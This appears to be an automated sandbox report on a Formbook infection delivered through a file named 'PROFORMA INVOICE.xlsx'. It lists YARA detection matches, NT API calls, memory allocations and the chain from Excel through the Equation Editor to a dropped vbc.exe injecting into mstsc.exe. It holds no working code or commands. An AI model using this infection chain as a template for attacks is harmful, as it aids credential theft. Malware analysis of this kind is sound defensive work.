Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_02683A83	11_2_02683A83
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025F7B00	11_2_025F7B00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_0265DBDA	11_2_0265DBDA
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_0267CBA4	11_2_0267CBA4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025DC85C	11_2_025DC85C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025F286D	11_2_025F286D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_0266F8EE	11_2_0266F8EE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_02655955	11_2_02655955
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025E69FE	11_2_025E69FE
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_0267098E	11_2_0267098E
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025D29B2	11_2_025D29B2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025EEE4C	11_2_025EEE4C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_02602E2F	11_2_02602E2F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025FDF7C	11_2_025FDF7C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025E0F3F	11_2_025E0F3F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025DCD5B	11_2_025DCD5B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_02600D3B	11_2_02600D3B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_0266FDDD	11_2_0266FDDD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000CDC20	11_2_000CDC20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000C927B	11_2_000C927B
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000C9280	11_2_000C9280

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winsqlite3.dll	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.27da9ec.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Windows\SysWOW64\mstsc.exe	Code function: String function: 025CDF5C appears 107 times
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: String function: 02613F92 appears 108 times
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: String function: 0261373B appears 238 times
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: String function: 0263F970 appears 81 times
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: String function: 025CE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008D3F92 appears 43 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008D373B appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0088DF5C appears 54 times

Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A310 NtCreateFile,	9_2_0041A310
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A3C0 NtReadFile,	9_2_0041A3C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A440 NtClose,	9_2_0041A440
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A4F0 NtAllocateVirtualMemory,	9_2_0041A4F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0041A30C NtCreateFile,	9_2_0041A30C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008800C4 NtCreateFile,LdrInitializeThunk,	9_2_008800C4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00880048 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_00880048
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00880078 NtResumeThread,LdrInitializeThunk,	9_2_00880078
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008807AC NtCreateMutant,LdrInitializeThunk,	9_2_008807AC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087F9F0 NtClose,LdrInitializeThunk,	9_2_0087F9F0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087F900 NtReadFile,LdrInitializeThunk,	9_2_0087F900
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_0087FAD0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,	9_2_0087FAE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FBB8 NtQueryInformationToken,LdrInitializeThunk,	9_2_0087FBB8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_0087FB68
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FC90 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_0087FC90
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FC60 NtMapViewOfSection,LdrInitializeThunk,	9_2_0087FC60
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FD8C NtDelayExecution,LdrInitializeThunk,	9_2_0087FD8C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_0087FDC0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FEA0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_0087FEA0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_0087FED0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0087FFB4 NtCreateSection,LdrInitializeThunk,	9_2_0087FFB4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008810D0 NtOpenProcessToken,	9_2_008810D0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00880060 NtQuerySection,	9_2_00880060
Source: C:\Users\Public\vbc.exe	Code function: 9_2_008801D4 NtSetValueKey,	9_2_008801D4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0088010C NtOpenDirectoryObject,	9_2_0088010C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00881148 NtOpenThread,	9_2_00881148
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C0078 NtResumeThread,LdrInitializeThunk,	11_2_025C0078
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C00C4 NtCreateFile,LdrInitializeThunk,	11_2_025C00C4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C07AC NtCreateMutant,LdrInitializeThunk,	11_2_025C07AC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFA50 NtEnumerateValueKey,LdrInitializeThunk,	11_2_025BFA50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_025BFAD0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFAE8 NtQueryInformationProcess,LdrInitializeThunk,	11_2_025BFAE8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFAB8 NtQueryValueKey,LdrInitializeThunk,	11_2_025BFAB8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFB50 NtCreateKey,LdrInitializeThunk,	11_2_025BFB50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFB68 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_025BFB68
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFBB8 NtQueryInformationToken,LdrInitializeThunk,	11_2_025BFBB8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BF900 NtReadFile,LdrInitializeThunk,	11_2_025BF900
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BF9F0 NtClose,LdrInitializeThunk,	11_2_025BF9F0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_025BFED0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFEA0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_025BFEA0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFFB4 NtCreateSection,LdrInitializeThunk,	11_2_025BFFB4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFC60 NtMapViewOfSection,LdrInitializeThunk,	11_2_025BFC60
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFC90 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_025BFC90
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFDC0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_025BFDC0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFD8C NtDelayExecution,LdrInitializeThunk,	11_2_025BFD8C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C0048 NtProtectVirtualMemory,	11_2_025C0048
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C0060 NtQuerySection,	11_2_025C0060
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C10D0 NtOpenProcessToken,	11_2_025C10D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C1148 NtOpenThread,	11_2_025C1148
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C010C NtOpenDirectoryObject,	11_2_025C010C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C01D4 NtSetValueKey,	11_2_025C01D4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFA20 NtQueryInformationFile,	11_2_025BFA20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFBE8 NtQueryVirtualMemory,	11_2_025BFBE8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BF8CC NtWaitForSingleObject,	11_2_025BF8CC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BF938 NtWriteFile,	11_2_025BF938
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C1930 NtSetContextThread,	11_2_025C1930
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFE24 NtWriteVirtualMemory,	11_2_025BFE24
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFF34 NtQueueApcThread,	11_2_025BFF34
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFFFC NtCreateProcessEx,	11_2_025BFFFC
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFC48 NtSetInformationFile,	11_2_025BFC48
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C0C40 NtGetContextThread,	11_2_025C0C40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFC30 NtOpenProcess,	11_2_025BFC30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025BFD5C NtEnumerateKey,	11_2_025BFD5C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_025C1D80 NtSuspendThread,	11_2_025C1D80
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000DA310 NtCreateFile,	11_2_000DA310
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000DA3C0 NtReadFile,	11_2_000DA3C0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000DA440 NtClose,	11_2_000DA440
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 11_2_000DA4F0 NtAllocateVirtualMemory,	11_2_000DA4F0

Source: C:\Windows\SysWOW64\mstsc.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dDqpEdJEtzi.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PROFORMA INVOICE.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@13/16@3/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmp

Binary or memory string: .VBPud<_

Source: PROFORMA INVOICE.xlsx	Virustotal: Detection: 35%
Source: PROFORMA INVOICE.xlsx	ReversingLabs: Detection: 24%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................X.......:;......................0.......#.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................X.......U;......................0.......#.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................X.......};......................0......./.......................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................X........;......................0......./.........}.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................X........;......................0.......;...............\|.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................X........;......................0.......;.........}.............................	Jump to behavior
